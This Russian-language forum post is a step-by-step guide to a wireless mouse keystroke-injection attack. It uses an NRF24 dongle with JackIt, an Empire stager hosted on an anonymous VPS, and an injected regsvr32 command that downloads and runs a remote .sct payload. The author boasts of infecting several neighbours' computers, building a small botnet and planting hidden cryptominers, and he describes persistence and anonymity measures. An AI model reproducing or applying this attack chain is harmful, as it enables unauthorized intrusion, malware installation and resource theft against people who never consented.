Необычный взлом! с помощью чипа NRF24 и Hackrf-one или просто SDR тунер
Life-Hack"А не написать ли мне статью?" Ходил я с этими мыслями три дня и четыре ночи с ней спал .... Авось кто нить прочитает да и дополнит чем нибудь дельным.... Эх оглянувшись на все, думаю все же напишу-ка))
Этот взлом не раз описывался в бурж-нете да и на хабре была статья но все же интересно пройти через все невзгоды самому и подробно описать так сказать весь процесс создания этой атаки.
Вы спросите а нах нам еще про это читать когда все и так уже описано не раз и по русски, нет, отвечу я вам, методика мне показалось очень актуальной и не умрет, а наоборот будет цвести и пахнуть с прогрессом что нам и на руку!
И так поехали нам понадобится VPS на базе убунту или дебиан что в принципе одно и тоже с внешним айпи адресом желательно где нить в Гватемале!)) или в любой другой стране Тайвань, в идеале там где обитают попуасы которые про Россию слышали только раз в жизни и то не помнят где и от кого!))) Ну это о анонимности, мы же занимаемся не благим делом. ДА!? Сетевые разбойники......
Ноутбук, нетбук с не убитым аккумулятором, а то будет конец фильма на самом интересном месте, кто смотрел "жулиану" в 90-ых тот меня поймет или "просто Мария" да.. Как сейчас помню как я в голготках и в юном возрасте кулаками, об колени бил себя в растройстве по вечерам что не узнал как там дальше в сериале найдет ли Круз Кастилио потерявшуюся Идн или нет ...
О главном опишу два варианта бюджетный и дорогой начну с первого покупаем на али вот эту вещЪ стоит всего 5 баксов доставка быстрая продавашка вроде шустренько все отправляет!
Получили, прекрасно нужно будет припаять к нему антенну для большего радиуса действия вот как здесь в итоге должно получится вот так Антену можно любую на 2.4 Ггц подойдет от вайфай адаптера роутера и т.д. они тоже на этих частотах работают в основном есть конечно же и на 5Ггц вайфай но в наших широтах он встречается редко...
Далее идем на наш (Гватемальский) ВПС и устанавливаем софт, а именно нынче в тренде EMPIRE и сервис Apache2 который устанавливается простой командой:sudo apt-get install apache2 ну и запускаем его! sudo service apache2 start и еще очень важный момент устанавливаем утилиту SCREEN она предназначена для того чтобы запущенный процесс, скрипт не закрывался когда вы покидаете окно терминала управления вашим ВПС (то есть работал сутками) без Вашего присутствия это очень важный момент!
Итак идем в папку с empire устанавливаем и запускаем утилиту screen командой screen -S empire (создастся новая вкладка для него чтобы он фурычил без Вас)запускаем ./empire создаем: usestager windows/launcher_sct на мой взгляд он самый без палевный в данный момент командой INFO (маленькими) узнаем его настройки в строке OutFile вбиваем путь до сервиса апач /var/www/html/ название файла.sct настраиваем Listener подробно оставаться на этом не буду на борде много инфы на эту тему запуск, установка и т.д. по желанию можно настроить autorun persistence что бы Ваш зверек оставался в (вражеской)системе подольше)) описано здесь нажимаем CNTRL+A и D закрывая этим самым вкладку с empire . Идем домой на родной раб. стол подклчаем наш девайс-донгл качаем для него утилиту отсюда устанавливаем ! В папке с Jackit есть файлик pspwn открываем его в leafpad-e все стираем и пишем (ох сколько я часов потратил на все это что бы понять что туда писать)
GUI r DELAY 1000 ждем 1000 мл.сек WIN STRING r запускается run DELAY 300 ждет (так как машины не у всех быстрые, покааа сообразит)) SHIFT ALT меняется раскладка клавиатуры т.к. у всех по умолч. стоит русская DELAY 300 STRING regsvr32 /s /n /u /i:http://(IP-вашего ВПС)/(имя файла которого мы создали в empire).sct scrobj.dll << самый вкусный процесс в run печатается этот текст))) ENTER DELAY 400 STRING exit ну Вы поняли.. ENTER
Сохраняем запускаем скрипт jackit командой : ./jackit.py --script pspwn
ждем... Мне лично долго ждать не пришлось дело было вечером выходной много-этажка... поймал 4 -ех мышей запустил атаку 3 машины попались!)) поднялся на пару этажей выше еще парочка из 5 попались зашел на ВПС а там уже почти БОТНЕТ))) закинул скрытые майнеры пожинаю плоды, по двору правда еще не гулял...
Прошла неделя.... Я задался вопросом "так почему же ловит к примеру 5-6 мышей а заражается 2-3 машины?" Думаю Вы уже догадались что у нас в продаже идут (радио) мышки отдельно от клавиатуры и я нашел ответ как заставить вражеский курсор набирать на экранной клавиатуре (наш) текст в run powershell ... об этом позже, уже понадобится hackrf , GNUradio это есть дорогой вариант исполнения загрузки пэйлода
Для эффективности сего пред ставленого Вам метода можно еще прикупить усилитель на 2.4Ghz дабы покрыть все радио мыши в районе данный девайс уже спешит ко мне из Китая как приедет отпишу эффективность
ПС: моя первая статья, просьба сильно ногами не пинать меня т.к. за сочинения в школе у меня были двойки((( Простите за ВОДУ в начале! и продолжение следует так у меня в арсенале еще имеется PROXMARK, HACKRF-one и много чего еще интересного .. Источник